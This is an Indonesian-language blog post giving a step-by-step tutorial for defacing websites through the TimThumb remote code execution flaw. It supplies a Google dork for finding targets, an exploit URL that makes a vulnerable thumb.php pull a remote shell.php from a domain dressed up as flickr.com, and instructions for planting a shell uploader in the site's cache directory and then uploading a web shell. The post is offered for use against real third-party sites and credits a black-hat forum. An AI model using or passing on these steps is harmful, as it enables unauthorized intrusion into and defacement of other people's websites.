Deface Poc Timthumb RCE 1.x.x New Dork 2019
Monday 18 February 2019
1 Comment
Hai gan, kembali lagi sama mimin yang gans ini ea:v kali ini mimin bakal share tutorial deface poc timthumb rce langsung aja
•Bahan-Bahan
•Shell Backdor
•Script Deface
•Kopi+Usdud:v
Dork :
inurl:kinheditor (Kembangin)
Exploit : thumb.php?src=http://flickr.com.tukangpomjakarta/shell.php
VULN 1.30 kebawah
1.Dorking seperti biasa di google.com
NB : Dorking di google image.
2.Jika sudah menemukan target kasih exploit di belakang sitenya.
Contoh : site.com/thumb.php?src=http://flickr.com.tukangpomjakarta/shell.php
Lihat Gambar |
3.Jika muncul seperti gambar di atas berarti vuln dan bisa di eue:v
4.Kalian lihat tulisan yang di atas exploit tadi, itu adalah shell uploader kita, tinggal kalian tempelkan saja ke sitenya. Contoh : site.com/cache/blablabla.php
Lihat Gambar |
5.Jika sudah seperti itu kalian tinggal ambil tulisan "cache/dedot.php" dan pastekan ke target kalian
Lihat Gambar |
Dan taraa muncul form uploadernya:v
Aksesnya : site.com/cache/shellkalian.php
Source : https://forum.surabayablackhat.org
Gag ada tutor heck mobil bang :D
ReplyDelete